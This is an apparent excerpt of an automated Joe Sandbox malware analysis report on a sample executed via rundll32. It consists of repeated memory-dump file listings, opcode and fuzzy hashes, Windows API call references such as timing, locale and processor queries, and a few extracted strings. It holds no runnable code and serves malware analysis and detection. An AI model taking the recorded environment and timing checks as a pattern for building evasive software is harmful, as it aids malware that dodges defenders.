                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$AttributesCloseCreateErrorHandleLast
                    • String ID:
                    • API String ID: 2927643983-0
                    • Opcode ID: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                    • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                    • Opcode Fuzzy Hash: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                    • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLanguageSystem
                    • String ID:
                    • API String ID: 4166810957-0
                    • Opcode ID: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                    • Instruction ID: bb2f8fdc298b904da0d8311a6692b3c5818f4a7b9ef0247cd5b56ed5edd11b73
                    • Opcode Fuzzy Hash: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                    • Instruction Fuzzy Hash: A651B576210B8089DB20EF76D8953D92762FB8479CF905427EA0D8BB59DF78C9C5C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32 ref: 004155BB
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: FileModuleName
                    • String ID:
                    • API String ID: 514040917-0
                    • Opcode ID: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction ID: 501e22f373f49a8995146b0ee06b89f1180c0e2900e8ccb6f530d303bba059fa
                    • Opcode Fuzzy Hash: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                    • Instruction Fuzzy Hash: 8B111532220A5098DB20EFB6C8957DA2765E7487CCF51202AFA4E47B99DF79C189C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • Sleep.KERNEL32 ref: 0080F91E
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                      • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                    • Sleep.KERNEL32 ref: 0080F98C
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                    • API String ID: 3472027048-4255013377
                    • Opcode ID: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                    • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                    • Opcode Fuzzy Hash: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                    • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                    • GetTickCount.KERNEL32 ref: 0040D9A6
                    • GetTickCount.KERNEL32 ref: 0040D9BF
                    • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                    • GetTickCount.KERNEL32 ref: 0040DA2C
                    • GetTickCount.KERNEL32 ref: 0040DA65
                    • GetTickCount.KERNEL32 ref: 0040DA93
                    • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CountTick$CurrentThread
                    • String ID:
                    • API String ID: 3968769311-0
                    • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                    • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                    • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNEL32 ref: 0040D60A
                    • GetProcAddress.KERNEL32 ref: 0040D619
                    • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AddressHandleInformationLogicalModuleProcProcessor
                    • String ID: GetLogicalProcessorInformation$kernel32.dll
                    • API String ID: 4292003513-812649623
                    • Opcode ID: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
                    • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                    • Opcode Fuzzy Hash: e17043b3ff988dfc0a92e549ad8061999a29ff940cf781c395a70830300a29e0
